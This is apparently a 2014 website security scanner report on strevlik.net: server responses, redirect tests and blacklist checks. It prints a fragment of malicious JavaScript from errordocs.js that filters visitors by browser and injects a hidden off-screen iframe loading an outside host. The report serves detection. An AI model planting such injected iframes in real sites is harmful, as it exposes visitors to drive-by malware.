Scanned pages/files
Request | Server response | Status |
http://strevlik.net/ | 500 Internal Server Error Content-Length: 780 Content-Type: text/html | clean |
http://strevlik.net/errors/inc/errordocs.js | 200 OK Content-Length: 3459 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob document.write('<iframe sr'+'c'+'="http://ggggrenda.818998.com/eartdhfj.cgi?17" style="position:absolute;left'+':-'+'1200'+'p'+'x'+';'+'top'+':'+'-'+'1200'+'px'+';" height="170" width="170"></i'+'f'+'r'+'a'+'m'+'e>'); } }; })(); function get_path() { if (document.location.pathname !== undefined) { return document.location.pathname.replace( /[<]/g, "<").replace(/[>]/g, ">"); } else { return " "; } } Antivirus reports:
| ||
http://strevlik.net/test404page.js | 500 Internal Server Error Content-Length: 780 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: strevlik.net
Result:
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 23 Jul 2014 18:33:13 GMT
Accept-Ranges: bytes
ETag: "3b6567-30c-480be52cab300"
Server: Apache
Content-Length: 780
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 14:47:08 GMT
X-Pad: avoid browser bug
...780 bytes of data.
GET / HTTP/1.1
Host: strevlik.net
Result:
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 23 Jul 2014 18:33:13 GMT
Accept-Ranges: bytes
ETag: "3b6567-30c-480be52cab300"
Server: Apache
Content-Length: 780
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 14:47:08 GMT
X-Pad: avoid browser bug
...780 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: strevlik.net
Referer: http://www.google.com/search?q=strevlik.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: strevlik.net
Referer: http://www.google.com/search?q=strevlik.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=strevlik.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://strevlik.net/
Result: strevlik.net is not infected or malware details are not published yet.
Result: strevlik.net is not infected or malware details are not published yet.